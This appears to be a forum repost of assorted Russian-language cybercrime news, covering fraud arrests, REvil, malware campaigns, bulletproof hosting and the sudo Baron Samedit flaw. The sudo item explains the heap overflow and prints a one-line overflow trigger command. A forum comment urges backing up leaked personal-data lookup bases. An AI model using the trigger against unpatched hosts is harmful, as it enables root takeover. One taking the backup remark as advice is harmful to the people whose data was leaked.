В ходе проведения оперативно-розыскных мероприятий сотрудники Управления уголовного розыска ГУ МВД России по Херсонской области установили личности организатора группы интернет-мошенников и двоих его сообщников. Жертвами злоумышленников стали более 40 жителей Херсонской и Запорожской областей, а также Донецкой Народной Республики. Предварительная сумма ущерба составляет свыше 1 миллиона рублей.
Как оказалось, все потерпевшие откликнулись в мессенджере на объявления о продаже бытовой техники, запчастей для автомобилей и мотоциклов, мебели и стройматериалов. До отправки товара продавцы просили граждан полностью оплатить покупку и перевести деньги на указанные реквизиты банковской карты. Однако после этого переписка удалялась, а покупателей блокировали.
Оперативники установили, что один из участников аферы проживает в Краснодарском крае, а второй является жителем Каховского округа Херсонской области. Оба были задержаны правоохранителями. Они действовали по указанию 29-летнего лидера группы, который в 2023 году, по данным полицейских, уехал за границу.
По версии полиции, злоумышленники размещали объявления в в 60 различных каналах, используя чужие учетные данные. Оплата за несуществующие товары поступала на банковские карты жителей Каховского округа, которых подыскивал один из сообщников. После этого средства переводились на счета, подконтрольные жителю Кубани, а он в свою очередь отправлял финансы организатору преступной деятельности.
В отношении подозреваемых следователем следственной части Следственного управления ГУ МВД России по Херсонской области возбуждены уголовные дела по ст. 159 Уголовного кодекса Российской Федерации.
У двух задержанных подельников изъято более полутора миллионов рублей, а также иностранная валюта в сумме, эквивалентной более чем одному миллиону рублей. По ходатайству следствия одному из фигурантов избрана мера пресечения в виде заключения под стражу, второму – мера процессуального принуждения в виде обязательства о явке.
В настоящее время проводятся оперативно-розыскные мероприятия и следственные действия, направленные на установление всех эпизодов противоправной деятельности и возможных других ее участников, а также меры по задержанию организатора группы.
• Video: https://rutube.ru/video/13285b467e2409ded821f54d4b32bacf/?r=plemwd
Жертвами злоумышленников стали 300 европейцев.
Национальная полиция Испании ликвидировала группировку киберпреступников, которые обманом заработали 12,345,731 евро, используя фальшивые сайты для криптоинвестиций. Расследование началось после того, как юридический представитель одной из скопированных платформ сообщил о происходящем в полицию.
Правоохранительные органы арестовали 6 членов группировки в ходе мадридских и барселонских операций. Всем мошенникам будут предъявлены обвинения по подозрению в мошенничестве и отмыванию денег.
Чтобы обмануть невнимательных пользователей, киберпреступники делали свои сайты максимально похожими на оригинал и использовали тайпсквоттинг – одну из разновидностей киберсквоттинга, в основе которой лежит регистрация доменных имен, близких по написанию с адресами крупных и популярных ресурсов. Затем дело оставалось за малым – разослать жертвам фишинговые письма со ссылками на сайты. Попавшей на сайт жертве казалось, что она делает выгодные инвестиции, хотя на самом деле “вклады” отправлялись на банковские счета преступников.
Все похищенные средства переводились на банковские счета мошенников в Испании, Португалии, Польше и Франции, а затем отмывались через иностранные организации. Отмыв украденное, злоумышленники возвращали деньги на свои испанские счета.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=14662
Подозреваемый Даниил Пузыревский владеет винным заведением
Как выяснило издание Daily Storm, один из фигурантов уголовного дела, Даниил
Пузыревский, владеет винным рестораном Vincent на Театральной площади
Петербурга.
«Vincent — это место, где обедают примы Мариинского театра и его
художественный руководитель Валерий Гергиев. <...> В Vincent за вкусным ужином
заходили музыкант Сергей Шнуров, композитор Родион Щедрин, актеры Сергей
Безруков и Рэйф Файнс и многие другие известные люди», — указано на главной
странице сайта ресторана.
15 января Тверской суд Москвы арестовал по делу о хакерской группировке REvil
тезку петербургского бизнесмена. Как оказалось, фигурант уголовного дела и
ресторатор — один и тот же человек.
Всего п о делу REvil , кроме Пузыревского, проходят Артем Заец, Алексей
Малоземов, Дмитрий Коротаев, Руслан Хансвяров, Михаил Головачук, Роман
Муромский и Андрей Бессонов. Их подозревают в совершении преступления,
предусмотренного ч. 2 ст. 187 УК РФ ("Неправомерный оборот средств
платежей")".
В деле фигурируют как минимум 14 человек, однако следствие раскрыло имена лишь
восьми из них.
Группировка REvil причастна к хакерским атакам на крупнейшего производителя
мяса в мире, на американский трубопровод Colonial Pipeline , а также на
бразильскую компанию JBS. За возврат доступа к данным злоумышленники требовали
выкуп.
Хакер из Краснодара заражал компьютеры в Европе и Америке вредоносным ПО и крал данные банковских карт.
Житель Краснодарского края был признан виновным Темрюкским районным судом в создании и распространении вредоносного ПО, а также в финансировании запрещенного в России Фонда борьбы с коррупцией (ФБК*).
Согласно пресс-службе судов Краснодарского края, мужчина занимался кражей данных банковских карт иностранцев и переводил часть средств ФБК. С помощью соучастников из интернета – трафферов, которые распространяли вредоносные файлы по электронной почте, мужчина заражал компьютеры граждан Западной Европы и Америки. За каждую тысячу заражённых ПК каждый соучастник получал $250.
Всю украденную информацию обвиняемый хранил на своем ПК и совершал покупки на различных платформах. Сотрудники ФСБ Краснодарского края задержали мужчину. Подсудимому вынесен приговор в виде пяти лет лишения свободы и штраф 200 тыс. рублей.
source: t.me/opskuban/583
Киберпреступники атакуют юридические компании с помощью вредоносных программ GootLoader и FakeUpdates
По словам исследователей, браузерные атаки в последние годы обошли по популярности e-mail фишинг.
В начале 2023 года шесть различных юридических фирм стали мишенью для атак в рамках двух разрозненных вредоносных кампаний. В своих атак злоумышленники использовали программы GootLoader и FakeUpdates (также известную как SocGholish).
GootLoader, активный с конца 2020 года, представляет собой загрузчик первого этапа, способный доставлять широкий спектр вторичных полезных нагрузок, таких как Cobalt Strike и различные программы-вымогатели. Для своей работы он использует метод SEO poisoning чтобы направить жертв, ищущих документы, связанные с бизнесом, на фишинговые сайты с вредоносным ПО на основе JavaScript
Во вредоносной кампании, подробно описанной eSentire, говорится, что злоумышленники взламывали законные, но уязвимые веб-сайты на основе WordPress и добавляли в форумы новые сообщения, тематически интересующие потенциальных жертв. Разумеется, эти сообщения содержали вредоносные ссылки.
«Когда пользователь переходит на одну из вредоносных веб-страниц и нажимает на ссылку для загрузки предполагаемого делового соглашения, он неосознанно загружает GootLoader», — заявил Киган Кеплингер, исследователь eSentire.
На изображении ниже видно, как злоумышленник на одном из зарубежных форумов оставил 3 сообщения с разных учётных записей: просьбу порекомендовать финансовый инструмент для расчёта зарплаты, ответ с вредоносной ссылкой и благодарность с подтверждением работоспособности инструмента. Когда диалог такого рода видит человек, заинтересованный в таком же финансовом инструменте, он отключает бдительность и добровольно загружает вредоносный файл на свой компьютер.
Однако GootLoader — далеко не единственная вредоносная программа на JavaScript, нацеленная на бизнес-сегмент и сотрудников юридических фирм. Отдельные вредоносные кампании используют другой вредонос — FakeUpdates (SocGholish). Он позволяет «сбрасывать» в целевой системе больше исполняемых файлов, а для его распространения часто используется метод Watering Hole.
«До 2021 года фишинг через электронную почту был основным вектором заражения, используемым злоумышленниками. Но браузерные атаки в последние годы показали значительный рост и сейчас полноценно конкурируют с электронной почтой как основным вектором заражения. Во многом это произошло благодаря GootLoader, SocGholish, SolarMarker и недавним кампаниям с использованием Google Ads для размещения в топе результатов поиска», — сообщил исследователь eSentire.
Исследователи безопасности из компании Qualys выявили критическую уязвимость (CVE-2021-3156) в утилите sudo, предназначенной для организации выполнения команд от имени других пользователей. Уязвимость позволяет получить доступ с правами root без прохождения аутентификации и без наличия необходимых полномочий. Проблема может быть эксплуатирована любым пользователем, независимо от присутствия в системных группах и наличия записи в файле /etc/sudoers. Для атаки не требуется ввод пароля пользователя, т.е. уязвимость может применяться посторонним для повышения привилегий в системе после компрометации уязвимости в непривилегированном процессе (в том числе запускаемом под пользователем "nobody").
Исследователи продемонстрировали рабочие эксплоиты для получения полных привилегий root в Ubuntu 20.04, Debian 10 и Fedora 33. Не исключается возможность эксплуатации уязвимости и в других операционных системах и дистрибутивах, но проверка исследователями ограничилась Ubuntu, Debian и Fedora. Проблеме подвержены все версии sudo с 1.8.2 по 1.8.31p2 и с 1.9.0 по 1.9.5p1 в конфигурации по умолчанию. Исправление предложено в выпуске sudo 1.9.5p2.
Исследователи заранее уведомили разработчиков дистрибутивов, которые скоординировано уже выпустили обновления пакетов: Debian, RHEL, Fedora, Ubuntu, SUSE/openSUSE, Arch, Slackware, Gentoo, FreeBSD. Для проверки наличия уязвимости в своей системе достаточно запустить команду "sudoedit -s /". Уязвимость присутствует в случае вывода ошибки, начинающейся с "sudoedit:".
Уязвимость проявляется с июля 2011 года и вызвана переполнением буфера при обработке символов экранирования строки в параметрах, предназначенных для запуска команд в режиме shell. Режим shell включается при указании аргументов "-i" или "-s" и приводит к тому, что команда запускается не напрямую, а через дополнительный вызов командной оболочки с флагом "-c" ("sh -c команда"). Суть проблемы в том, что при штатном запуске утилита sudo экранирует специальные символы при указании опций "-i" и "-s", но при запуске утилиты sudoedit экранирования параметров не происходит, так как функция parse_args() выставляет переменную окружения MODE_EDIT вместо MODE_SHELL и не сбрасывает значение "valid_flags".
В свою очередь, передача неэкранированных символов создаёт условия для проявления ещё одной ошибки в обработчике, выполняющем удаление символов экранирования перед сверкой c правилами sudoers. Обработчик некорректно разбирает присутствие неэкранированного символа обратного слеша в конце строки, считает что данный обратный слеш экранирует ещё один символ и продолжает чтение данных, находящихся за границей строки, копируя их в буфер "user_args" и перезаписывая области памяти за границей данного буфера. Например, для вызова переполнения можно выполнить:
Code:Copy to clipboard
sudoedit -s '\' `perl -e 'print "A" x 65536'`
Манипулируя значениями в командной строке sudoedit можно добиться наложения перезаписываемого хвоста на данные, влияющие на дальнейший ход работы. Создание эксплоита упрощает то, что атакующий полностью контролирует размер буфера user_args, который соответствует размеру всех переданных аргументов, а также через переменные окружения контролирует размер и содержимое данных, записываемых за границу буфера. Исследователям удалось подготовить три эксплоита, работа которых строится на перезаписи содержимого структур sudo_hook_entry, service_user и def_timestampdir:
При переопределении sudo_hook_entry удалось запустить бинарный файл с именем "SYSTEMD_BYPASS_USERDB" с правами root.
При переопределении service_user удалось выполнить произвольный код с правами root.
При переопределении def_timestampdir удалось добиться сброса содержимого стека sudo, включая переменные окружения, в файл /etc/passwd, и добиться подстановки пользователя с правами root.
• Source: [https://blog.qualys.com/vulnerabili...p-based-buffer-overflow-in- sudo-baron-samedit](https://blog.qualys.com/vulnerabilities- research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron- samedit)
• Source: <https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap- based-overflow-sudo.txt>
В ветку ядра linux-next включен код для написания [драйверов на Rust](https://git.kernel.org/pub/scm/linux/kernel/git/next/linux- next.git/tree/Documentation/rust), сам [патч](https://git.kernel.org/pub/scm/linux/kernel/git/next/linux- next.git/commit/?id=c7c4c9b88eecb28d3b48ba855cd6f9f7391a33b2). Пока неясно, оставит Линус это или нет, он высказывается довольно туманно, из его слов не совсем понятно, есть ли четкие критерии включения.
__
](https://lwn.net/Articles/849849/rss)
lwn.net
Spoiler: Пример драйвера на Rust
C-like:Copy to clipboard
// SPDX-License-Identifier: GPL-2.0
//! Rust example module
#![no_std]
#![feature(allocator_api, global_asm)]
#![feature(test)]
use alloc::boxed::Box;
use core::pin::Pin;
use kernel::prelude::*;
use kernel::{
chrdev, condvar_init, cstr,
file_operations::FileOperations,
miscdev, mutex_init, spinlock_init,
sync::{CondVar, Mutex, SpinLock},
};
module! {
type: RustExample,
name: b"rust_example",
author: b"Rust for Linux Contributors",
description: b"An example kernel module written in Rust",
license: b"GPL v2",
params: {
my_bool: bool {
default: true,
permissions: 0,
description: b"Example of bool",
},
my_i32: i32 {
default: 42,
permissions: 0o644,
description: b"Example of i32",
},
my_str: str {
default: b"default str val",
permissions: 0o644,
description: b"Example of a string param",
},
my_usize: usize {
default: 42,
permissions: 0o644,
description: b"Example of usize",
},
my_array: ArrayParam<i32, 3> {
default: [0, 1],
permissions: 0,
description: b"Example of array",
},
},
}
struct RustFile;
impl FileOperations for RustFile {
type Wrapper = Box<Self>;
kernel::declare_file_operations!();
fn open() -> KernelResult<Self::Wrapper> {
println!("rust file was opened!");
Ok(Box::try_new(Self)?)
}
}
struct RustExample {
message: String,
_chrdev: Pin<Box<chrdev::Registration<2>>>,
_dev: Pin<Box<miscdev::Registration>>,
}
impl KernelModule for RustExample {
fn init() -> KernelResult<Self> {
println!("Rust Example (init)");
println!("Am I built-in? {}", !cfg!(MODULE));
{
let lock = THIS_MODULE.kernel_param_lock();
println!("Parameters:");
println!(" my_bool: {}", my_bool.read());
println!(" my_i32: {}", my_i32.read(&lock));
println!(
" my_str: {}",
core::str::from_utf8(my_str.read(&lock))?
);
println!(" my_usize: {}", my_usize.read(&lock));
println!(" my_array: {:?}", my_array.read());
}
// Test mutexes.
{
// SAFETY: `init` is called below.
let data = Pin::from(Box::try_new(unsafe { Mutex::new(0) })?);
mutex_init!(data.as_ref(), "RustExample::init::data1");
*data.lock() = 10;
println!("Value: {}", *data.lock());
// SAFETY: `init` is called below.
let cv = Pin::from(Box::try_new(unsafe { CondVar::new() })?);
condvar_init!(cv.as_ref(), "RustExample::init::cv1");
{
let guard = data.lock();
#[allow(clippy::while_immutable_condition)]
while *guard != 10 {
cv.wait(&guard);
}
}
cv.notify_one();
cv.notify_all();
cv.free_waiters();
}
// Test spinlocks.
{
// SAFETY: `init` is called below.
let data = Pin::from(Box::try_new(unsafe { SpinLock::new(0) })?);
spinlock_init!(data.as_ref(), "RustExample::init::data2");
*data.lock() = 10;
println!("Value: {}", *data.lock());
// SAFETY: `init` is called below.
let cv = Pin::from(Box::try_new(unsafe { CondVar::new() })?);
condvar_init!(cv.as_ref(), "RustExample::init::cv2");
{
let guard = data.lock();
#[allow(clippy::while_immutable_condition)]
while *guard != 10 {
cv.wait(&guard);
}
}
cv.notify_one();
cv.notify_all();
cv.free_waiters();
}
// Including this large variable on the stack will trigger
// stack probing on the supported archs.
// This will verify that stack probing does not lead to
// any errors if we need to link `__rust_probestack`.
let x: [u64; 514] = core::hint::black_box([5; 514]);
println!("Large array has length: {}", x.len());
let mut chrdev_reg =
chrdev::Registration::new_pinned(cstr!("rust_chrdev"), 0, &THIS_MODULE)?;
// Register the same kind of device twice, we're just demonstrating
// that you can use multiple minors. There are two minors in this case
// because its type is `chrdev::Registration<2>`
chrdev_reg.as_mut().register::<RustFile>()?;
chrdev_reg.as_mut().register::<RustFile>()?;
Ok(RustExample {
message: "on the heap!".to_owned(),
_dev: miscdev::Registration::new_pinned::<RustFile>(cstr!("rust_miscdev"), None)?,
_chrdev: chrdev_reg,
})
}
}
impl Drop for RustExample {
fn drop(&mut self) {
println!("My message is {}", self.message);
println!("Rust Example (exit)");
}
}
Разработчики криптовалютного кошелька MyAlgo для сети Algorand призвали всех пользователей вывести свои средства с адресов, созданных с применением кодовой фразы, в связи с возможным взломом.
Хакерам удалось украсть активов на сумму $9,2 млн, при этом разработчики MyAlgo так и не смогли найти уязвимость и закрыть ее, поэтому попросили всех пользователей вывести средства.
«Мы крайне рекомендуем вывести любые средства с кошельков, созданных с использованием мнемонической фразы. Мы все еще не знаем корневую причину недавних взломов, поэтому просим всех предусмотрительно вывести средства. Спасибо за понимание», ― пишут разработчики MyAlgo.
Хакеры атаковали около 25 крупных кошельков и вывели свыше 19,5 млн монет ALGO и более 3,5 млн токенов USDC. Общий объем украденных средств составил $9,2 млн, правда, криптовалютной бирже ChangeNOW удалось заморозить активы на $1,5 млн.
Аналитики из компании D13.co считают, что, возможно, кодовые фразы от кошельков были украдены с помощью социальной инженерии, либо же с помощью вирусов. Разработчики MyAlgo заявили, что продолжат работать с властями для возвращения средств и обнаружения уязвимости.
Ранее сообщалось, что хакерам удалось украсть 2 000 закрытых ключей из кошелька Edge Wallet.
Члена международной хакерской группировки, которая украла у разных банков более одного миллиарда рублей, задержали в Москве. Об этом в воскресенье, 21 марта, сообщает «Московский комсомолец».
По данным издания, речь идет о 31-летнем Артеме Мазуренко. Его удалось задержать 19 марта. Сообщается, что мужчина находился в розыске с 2018 года, когда в руки полиции попались его подельники.
В 2019-м суд в Москве отправил на 13 лет в колонию строгого режима лидера группировки Юрия Лысенко, передавало агентство РИА Новости. Его посадили за мошенничество и хищение миллиарда рублей со счетов российских банков. Вместе с Лысенко от 5 до 12 лет лишения свободы получили 11 его сообщников. На тот момент в бегах находились еще двое членов группировки — Мазуренко и Антон Якименко.
По версии следствия, Лысенко в период с 1 июня по 18 июля 2014 создал преступное сообщество в Москве. Он арендовал жилое помещение, приобрел и разместил в нем средства вычислительной техники и мобильной связи, необходимые для оперативной передачи информации остальными участниками группы. Арендовал он и удаленные сервера за границей.
Деньги со счетов выводились при помощи подложных электронных платежных поручений и специальной программы. От действий группировки пострадали Промсвязьбанк, а также банки «Уралсиб», «Траст» и «Зенит».
Россиянина Евгения Дорошенко обвинили в США в работе брокером начального доступа. 31-летнему астраханцу, скрывающемуся под никами Flanker (на форуме WWH) и FlankerWWH (на Exploit), подозревают во взломе как минимум одной компании из Нью-Джерси. Вместе с тем, в заявлении Министерства юстиции указывается, что он оказывает подобные услуги еще с 2019 года.
«За мошенничество с использованием электронных средств максимальное наказание составляет 20 лет тюремного заключения, за компьютерное мошенничество — пять лет», — сказано в заявлении.
Click to expand...
Изданию Bleeping Computer удалось найти тему о продаже доступа к указанной американской компании. Дорошенко установил тогда стартовую цену в размере 3000 долларов с аукционным шагом в 500 долларов или мгновенной продажей за 6000 долларов. Анализ его сообщений навел аналитиков на мысль, что предпочтительный метод атаки Flanker — брутфорс служб протокола удаленного рабочего стола.
В ходе арбитража на одной из площадок Flanker косвенно подтвердил что он живет в Астрахани. Пробив Дорошенко по связанному с ним рабочему аккаунту в Telegram демонстрирует, что он не очень беспокоится о собственной безопасности. Найти можно как номера его телефонов, так и домашний адрес в Астрахани. При этом вскоре после появления новостей о предъявлении обвинений россиянин пытался найти выходы на модераторов Exploit.
justice[.]gov/usao-nj/pr/russian-citizen-charged-fraud-selling-access-victim-
computer-networks
bleepingcomputer[.]com/news/security/russian-indicted-for-selling-access-to-
us-corporate-networks

Популярный «пуленепробиваемый» хостинг Lolek был отключен американскими и
польскими властями, которые стремятся ограничить анонимный доступ
киберпреступников к критически важному для них инструменту.
Начиная с прошлой недели на главной странице Lolek размещается специальная «заглушка», которая гласит, что «домен был конфискован Федеральным бюро расследований и Налоговым управлением США в рамках скоординированной операции правоохранительных органов против компании Lolek Hosted».
Сообщается, что в операции также принимали участие прокуратура США и Министерство юстиции, и «существенную помощь» оказали два польских ведомства: региональная прокуратура Катовице и Центральное бюро по борьбе с киберпреступностью.
Издание [The Record](https://therecord.media/lolek-bulletproof-hosting- seizure-fbi-irs) сообщает, что представители властей отказались от комментариев, однако подтвердили журналистам, что баннер о закрытии хостинга подлинный.
Lolek был широко известным провайдером «пуленепробиваемого» хостинга, работавшим с 2009 года. Его упоминания часто можно встретить в статьях об анонимных хостинговых платформах. Хостинг базировался в Великобритании, и его дата-центры так же размещались в Европе.
«Пуленепробиваемые» хостинг-провайдеры, как правило, закрывают глаза на размещаемый клиентами контент и обещают сохранить их анонимность. Подобные компании известны тем, что предоставляют злоумышленникам IP-адреса, серверы и домены для распространения вредоносных программ, формирования ботнетов и выполнения других задач, связанных с мошенничеством и кибератаками.
В последние годы американские власти начали активно преследовать тех, кто предоставляет услуги «пуленепробиваемого» хостинга, занимаясь их экстрадицией и вынося им весьма жесткие приговоры.
К примеру, в июне текущего года Министерство юстиции США приговорило 39-летнего Михая Ионута Паунеску (Mihai Ionut Paunescu) к трем годам заключения за участие в управлении «пуленепробиваемым» хостингом PowerHost[.]ro.
В прошлом году 33-летний уроженец штата Иллинойс так же был осужден за владение и управление двумя сайтами для содействия DDoS-атакам (DownThem.org и AmpNode.com), которые, помимо прочего, предоставляли клиентам и услуги «пуленепробиваемого» хостинга.
Испанская национальная полиция ликвидировала киберпреступную группировку, обвиняемую в масштабном кибермошенничестве - краже и монетизации данных более, чем четырёх миллионов жертв.
В рамках спецоперации было проведено 16 обысков по всей стране: в Мадриде, Малаге, Уэльве, Аликанте и Мурсии. По итогу арестовано 34 человека. Во время рейдов полиция конфисковала огнестрельное и холодное оружие, четыре автомобиля премиум-класса, 80 000 евро наличными, а также компьютеры с самыми главными уликами.
По данным полиции, преступники проводили фишинговые атаки через электронную почту и SMS, выдавая себя за представителей безобидных организаций: например, служб доставки или энергетических компаний.
Часто использовалась так называемая тактика «son in distress» (сын в беде): мошенники звонили родителям и убеждали, что их ребенок в опасности.
Тактики и цели у группировки были настолько разнообразными, что их довольно трудно связать между собой. У них также было много сообщников. Например, инсайдеры в крупных технологических компаниях помогали менять получателя и адрес доставки дорогостоящих товаров.
Расследование началось в начале 2023 года после тысяч обращений от пострадавших. Мошенники взламывали базы данных финансовых учреждений и начисляли определенную сумму на счета клиентов. Затем они связывались с этими клиентами, утверждая, что деньги были зачислены по ошибке и теперь их необходимо вернуть.
Для «возврата» человек должен был совершить ряд действий. Первое из них – перейти по ссылке, которая вела на фишинговую страницу, практически идентичную официальному сайту банка. Жертва вводила в специальной форме свои учетные данные, которые сразу же попадали в руки злоумышленников.
Согласно оценкам, таким образом группировке удалось «нажиться» на 3 000 000 евро. Средства конвертировались в криптовалюту, чтобы их перемещение было труднее отслеживать.
Лидеры киберпреступной группы уже находятся за решеткой. В ближайшие месяцы следователи будут работать над установлением личностей других участников.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15928
Россия и США по-разному представляют себе борьбу с хакерскими атаками, следует из обмена мнениями между представителями этих стран при ООН. Постпред Соединенных Штатов при ООН Линда Томас-Гринфилд во вторник, 29 июня, во время открытого заседания Совета Безопасности предложила использовать для борьбы с киберугрозами существующий инструментарий ООН. Представитель России Василий Небензя предложил выработать новые соглашения по этому вопросу.
ООН усердно работала над общими правилами и взяла на себя соответствующие обязательства, подчеркнула Томас-Гринфилд. "Настало время реализовать их", - заявила она, не упомянув Россию, которую США неоднократно обвиняли в хакерских атаках.
Госдеп США сообщил о конструктивном диалоге Вашингтона и Москвы
В тот же день госсекретарь Соединенных Штатов Энтони Блинкен заявил, что Вашингтон ждет от Москвы "результатов" в борьбе с киберугрозами. "Ни одна ответственная страна не должна заниматься укрывательством, предоставлением убежища преступным организациям, которые участвуют в такого рода атаках", - подчеркнул глава Госдепартамента. По его мнению, у США и России "были некоторые конструктивные беседы". "Посмотрим, выйдут ли из них практические результаты", - заявил Блинкен в интервью итальянской национальной телерадиовещательной корпорации.
16 июня в Женеве состоялись переговоры президентов России и США Владимира Путина и Джо Байдена. На них стороны заявили о намерении начать консультации по кибербезопасности.
В нашем telegram и twitter мы объявили о возобновлении операции "Детская безопасность", которая направлена против интернет-педофилии и сайтов, содержащих или распространяющих детскую порнографию.
#GhostSec хотел бы объявить о возобновлении операции "Безопасность детей", мы также включаем инструкции о том, как ВЫ можете оказать поддержку
Ссылка на вставку: https://ghostbin.co/paste/pp27w8
Ссылка на видео Youtube:
Твит:
__https://twitter.com/x/status/1405178107426873347
#GhostSec #OpChildsafety #Anonymous
For English speakers
On our telegram and twitter we announced the return to operation child safety which is attacks against internet pedophilia and sites that contain or distribute child pornography
#GhostSec would like to announce the Resumption of Operation Child Safety, we also include instructions on how YOU can support
Link to paste: https://ghostbin.co/paste/pp27w8
Link to Youtube video:
Tweet:
__https://twitter.com/x/status/1405178107426873347
#GhostSec #OpChildsafety #Anonymous
По данным следствия, в 2019 году у жителя Житомирской области возник умысел на незаконное обогащение путем несанкционированного вмешательства в сеть электросвязи операторов мобильной связи Киевстар и Vodafone с использованием специального программно-аппаратного комплекса. С этой целью он приобрел специальное оборудование, которое объединил в единую телекоммуникационную сеть, после чего загрузил и инсталлировал специальное программное обеспечение.
период времени с декабря 2019 г. по июнь 2020 г., используя компьютерную технику, соответствующее программное обеспечение и GSM-модемы с сим-картами операторов мобильной связи Киевстар и Vodafone, злоумышленник несанкционированно вмешивался в работу электронно-вычислительных сетей электросвязи указанных операторов, что приводило к искажению процесса обработки информации и нарушению установленного порядка маршрутизации информации. В результате этого входящие международные телефонные звонки, поступавшие через смонтированное преступником телекоммуникационное оборудование, тарифицировались операторами мобильной связи не как международные, а как внутригосударственные, за что он получал вознаграждение от неустановленного следствием лица на свои банковские счета.
Согласно заключению эксперта, размер убытков, причиненного операторам вследствие нарушения установленного порядка маршрутизации международного трафика за указанный период, составил 5 991,24 грн.
Обвиняемый свою вину в совершении уголовного преступления признал полностью, искренне раскаялся в содеянном преступлении и попросил строго его не наказывать.
Представитель потерпевшей стороны в судебном заседании отметил, что причиненный вред обвиняемым возмещен, в связи с чем он отказывается от иска.
Исходя из изложенного, суд посчитал вину обвиняемого доказанной полностью и квалифицировал его умышленные действия по ст. 361 ч.1 УК Украины (несанкционированное вмешательство в работу сетей электросвязи, что привело к искажению обработки информации и к нарушению установленного порядка ее маршрутизации) и назначил наказание в виде штрафа в размере 17 тысяч гривен. Кроме этого, осужденный должен оплатить в пользу государства процессуальные расходы, связанные с привлечением экспертов в общей сумме 19614 гривен.
В Госдуму внесли законопроект об уголовной ответственности за
«незаконное» использование персональных данных.
Депутаты и сенаторы от «Единой России» внесли в Госдуму пакет законопроектов, которые увеличат наказания за утечки персональных данных, а также введут уголовную ответственность за использование этих данных. Соответствующие документы опубликованы на сайте нижней палаты парламента.
В частности, законодатели предложили дополнить Уголовный кодекс статьей 272.1, устанавливающей ответственность за:
- Незаконное использование, передачу, сбор и хранение персональных данных , полученных незаконным способом. За это будет грозить до четырех лет лишения свободы. Или до пяти лет — если информация содержит «специальные категории данных» или биометрические персональные данные;
- Незаконное использование персональных данных из «корыстной заинтересованности», повлекшее крупный ущерб, совершенное группой лиц по предварительному сговору или с использованием служебного положения. Наказание по этой части статьи предусматривает до шести лет лишения свободы со штрафом в размере до одного миллиона рублей;
- Те же деяния, связанные с передачей персональных данных за границу. Наказание предусматривает до восьми лет лишения свободы со штрафом до двух миллионов рублей. Если эти действия привели к тяжким последствиям или были совершены организованной группой, то наказание составит до десяти лет лишения свободы со штрафом до трех миллионов рублей;
- Создание ресурсов или программ , заведомо предназначенных для незаконного хранения и передачи информации, содержащей персональные данные. Наказание предусматривает до пяти лет лишения свободы со штрафом до 700 тысяч рублей.
Помимо этого, законодатели предложили ужесточить наказание за утечки персональных данных. Как пояснил секретарь генерального совета «Единой России» Андрей Турчак, наказание будет меняться в зависимости от объема утечки.
Click to expand...
Итак, пока все это не приняли - похоже надо срочно делать локальный бекап баз "глаза"...
Киберпреступники прячут вредоносную программу в софте, предназначенном для читерства в компьютерной игре Call of Duty: Warzone. Компания Activision, занимающаяся разработкой этого проекта, уже в курсе действий злоумышленников и даже успела укорить читеров.
Полный отчёт Activision можно найти по этой ссылке (PDF). В частности, команда исследователей отмечает, что некие «хакеры» обманом пытаются заставить пользователей скачать фейковые читы для Warzone.
После запуска таких читов в дело вступает вредоносная программа, которая может запустить на компьютере жертвы любой пейлоад — всё зависит исключительно от потребностей и фантазии атакующего.
Разработчики также [предупреждают](https://www.vice.com/en/article/7k9m5a/call-of-duty-warzone- bans-more-than-60000-cheaters) потенциальных читеров, что вредоносные программы — не единственное, о чём им стоит беспокоиться. Даже если злоумышленники не запустят на компьютере зловред, вас просто забанят в самой игре.
К слову, специалисты Cisco Talos также [рассказали](https://blog.talosintelligence.com/2021/03/cheating-cheater-how- adversaries-are.html) о спрятанных в модах и читах вредоносах. По словам экспертов, злоумышленники используют соцсети и видеоролики на YouTube для продвижения неких «инструментов для модификации видеоигр». Само собой, на деле ими оказываются вредоносные программы.
Одним из зловредов, фигурирующим в таких кампаниях, стал XtremeRAT (или ExtRat) — RAT-троян, распространяемый на коммерческой основе.
Прятать вредоносы в читах и модах для видеоигр — вполне известная тактика. Например, в 2019 году так распространялись фейковые читы для CS: GO и PUBG. А в феврале 2021 года стало известно, что игроки в Cyberpunk 2077 могут выполнить на своём компьютере вредоносный код, загружая моды.
В Австралии полиция взломала и заблокировала платформу для обмена сообщениями, на которой была обнаружена переписка участников преступных группировок. Создатель мессенджера арестован.
Предъявлены обвинения
Австралийская полиция арестовала подозреваемого в создании и управлении приложением для обмена сообщениями, которым пользовались международные организованные преступные сообщества, сообщил Reuters.
Арестованный 32-летний мужчина, чье имя не называется, создал, по мнению следствия, «преступную платформу» Ghost, которую полиции удалось обезвредить.
«Для того, чтобы вывести из строя специальные зашифрованные устройства связи, требуется значительное мастерство», — сказал заместитель комиссара федеральной полиции Австралии Иэн Маккартни (Ian McCartney).
Кто использовал Ghost
Как утверждает полиция, Ghost использовали несколько банд и организованных преступных синдикатов на Ближнем Востоке, в Австралии и Южной Корее для импорта наркотиков и заказа убийств.
Представители полиции Австралии назвали это случай первым, когда гражданину страны предъявлено обвинение в создании и управлении глобальной преступной платформой.
Злоумышленники, скрывающиеся за рэнсом локером BianLian, были замечены в эксплуатации уязвимостей в ПО JetBrains TeamCity для осуществления своих атак. Согласно [новому исследованию](https://www.guidepointsecurity.com/blog/bianlian-gos-for- powershell-after-teamcity-exploitation/) GuidePoint Security, которые расследовали инцидент, атака началась с сервера TeamCity, против которого был применен бэкдор BianLian на PowerShell.
BianLian [появилась](https://thehackernews.com/2023/05/us-offers-10-million- bounty-for-capture.html) в июне 2022 и с тех пор полагается главным образом на тактику вымогательства с угрозами распространения утекших файлов, после того как в январе 2023 был [выпущен декриптор для их локера](https://thehackernews.com/2023/02/bitdefender-releases-free-decryptor- for.html).
Цепочка атаки, которую наблюдала инфосек компания, включала в себя эксплуатацию элементов TeamCity, используя [CVE-2024-27198](https://thehackernews.com/2024/03/cisa-warns-of-actively- exploited.html) или [CVE-2023-42793](https://thehackernews.com/2023/10/cisa- warns-of-active-exploitation-of.html), чтобы получить начальный доступ к среде с последующим созданием новых пользователей на сервере и исполнение вредоносных команд для эксплуатации и продвижению по сети.
Пока неясно, какую именно из двух уязвимостей, злоумышленники использовали для получения данных.
